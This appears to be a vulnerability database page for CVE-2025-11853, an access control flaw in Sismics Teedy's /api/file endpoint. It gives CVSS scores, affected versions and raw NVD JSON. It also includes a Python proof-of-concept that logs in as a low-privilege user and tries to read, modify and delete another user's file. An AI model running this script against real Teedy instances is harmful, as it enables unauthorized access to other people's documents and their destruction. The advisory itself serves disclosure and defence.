Security Vulnerability Report
CVE-2025-11853 CVSS 6.3 MEDIUM

CVE-2025-11853

Published: 2025-10-16 19:15:32
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was determined in Sismics Teedy up to 1.11. This affects an unknown function of the file /api/file of the component API Endpoint. Executing a manipulation can lead to improper access controls. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
(This score and vector are the VulDB "Secondary" assessment. The NVD "Primary" CVSS 3.1 entry in the raw JSON below is CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H, base score 8.1 HIGH, and the CVSS 4.0 secondary entry scores 2.1 LOW; use the rating your programme treats as authoritative when prioritising.)

Configurations (Affected Products)

cpe:2.3:a:sismics:teedy:*:*:*:*:*:*:*:* - VULNERABLE
Sismics Teedy <= 1.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11853 PoC - Sismics Teedy Improper Access Control # Target: /api/file endpoint in Sismics Teedy <= 1.11 # Description: Exploits improper access controls in the API file endpoint import requests # Target configuration TARGET_URL = "http://target-teedy-instance.com" API_ENDPOINT = "/api/file" # Attacker credentials (low-privilege account) USERNAME = "attacker_user" PASSWORD = "attacker_password" # Step 1: Authenticate to obtain session token session = requests.Session() login_url = f"{TARGET_URL}/api/user/login" login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, json=login_data) if response.status_code == 200: token = response.json().get("token") print(f"[+] Authentication successful, token obtained") else: print("[-] Authentication failed") exit(1) # Step 2: Exploit improper access control on /api/file # Attempt to access/modify files without proper authorization headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Example: Access another user's file by manipulating the file ID target_file_id = "TARGET_FILE_ID_HERE" exploit_url = f"{TARGET_URL}{API_ENDPOINT}/{target_file_id}" # Attempt unauthorized file access response = session.get(exploit_url, headers=headers) if response.status_code == 200: print(f"[+] Unauthorized access successful!") print(f"[+] File data: {response.text}") else: print(f"[-] Access denied, status code: {response.status_code}") # Example: Attempt unauthorized file modification modify_data = { "title": "Modified Title", "description": "Unauthorized modification" } response = session.put(exploit_url, headers=headers, json=modify_data) if response.status_code == 200: print(f"[+] Unauthorized modification successful!") # Example: Attempt unauthorized file deletion response = session.delete(exploit_url, headers=headers) if response.status_code == 200: print(f"[+] Unauthorized deletion successful!")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11853", "sourceIdentifier": "[email protected]", "published": "2025-10-16T19:15:32.420", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Sismics Teedy up to 1.11. This affects an unknown function of the file /api/file of the component API Endpoint. Executing a manipulation can lead to improper access controls. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", 
"Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:sismics:teedy:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.11", "matchCriteriaId": "10C041A4-4B9D-4A64-A199-C99E219CF0A2"}]}]}], "references": [{"url": "https://docs.google.com/document/d/1PzTPCtavuLx_GwREvshGMQ8N5zFDmpe-OAR5kZwOZfE/edit?usp=sharing", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328799", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328799", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.657060", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}